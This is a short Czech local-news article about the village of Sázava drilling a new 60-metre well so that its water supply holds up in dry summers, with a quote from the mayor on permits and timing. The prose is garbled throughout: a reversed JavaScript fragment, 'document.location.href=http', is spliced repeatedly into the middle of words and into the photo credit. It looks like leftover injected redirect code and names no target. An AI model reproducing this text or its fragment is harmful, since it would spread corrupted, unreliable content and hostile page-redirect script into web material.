Rainbow page separator

Nový vodní zdroj doplní v suchém létě obecní studny

Pondělí, 7. března 2016

Kapka vody - www.photohalama.com

Sázava / Dostatek vody by měli mít do budoucna v Sázavě, aby se tam už neopakovala situace z minulého léta, kdy museli vodovod zásobovat vodou přiváženou v cisternách, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože obecní studně nestačily. Poslouží k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu nový vodní zdroj; šedesátimetrový vrt na pozemcích nad koupalištěm byl vyhlouben začátkem roku.
Následně došlo k provedení čerpacích zkoušek i rozborů vody, dokončena byla také projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová dokumentace pro stavbu vodovodního řadu na propojení vrtu se sběrnou studnou, aby mohla být podána žádost o vydání rozhodnutí o umístění stavby ke žďárskému stavebnímu úřadu. Po vydání rozhodnutí bude ještě probíhat vodoprávní řízení. „Při něm bude stanoveno, kolik vody budeme moci prostřednictvím nového vrtu čerpat,“ uvedl starosta Sázavy František Ledvinka s tím, že stavba by měla být ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tova do začátku léta.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tohalama.com“ target=“_blank“>www.pho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tohalama.com